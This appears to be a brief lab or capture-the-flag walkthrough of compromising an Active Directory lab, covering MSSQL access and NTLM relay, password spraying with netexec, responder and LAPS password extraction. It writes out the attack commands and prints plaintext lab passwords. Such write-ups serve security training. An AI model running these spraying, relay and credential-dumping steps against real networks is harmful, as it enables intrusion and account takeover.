
Enumerating the smb shares of machine #3 we find creds:

Using these creds to login to mssql on machine #3 we get other creds: web_staging:'Washroom510'@

Now password spraying we find other accounts with same password:

Now doing NTLM Relay attack we get hash for an account:

exec xp_dirtree "\\\share"

Now checking if message signing is disabled:

nxc smb --gen-relay-list relay.txt

It is false

So starting an ntlm relay: -tf targets.txt -socks -smb2support

Now we can access shares

proxychains smbclient \\\\\\prod -U REFLECTION/SVC_WEB_STAGING

Now get new creds:

Now we can check with mssql on the dc: We get passwords from the prod database on DC.

Now trying responder: We get another user. We cant use nlm relaying as it doesnt work

Now password spraying all passwords we have with the users:

nxc smb -u users.list -p pass.txt --continue-on-success

Now we can use bloodhound:

But checking MachineAccountQuota:

Now we can try to get laps password

nxc ldap reflection.vl -u abbie.smith -p CMe1x+nlRaaWEw -M laps

With this password we can try to password spray:

nxc smb -u users.list -p "H447.++h6g5}xi" --local-auth --continue-on-success

We got the administrator on ms01

Last updated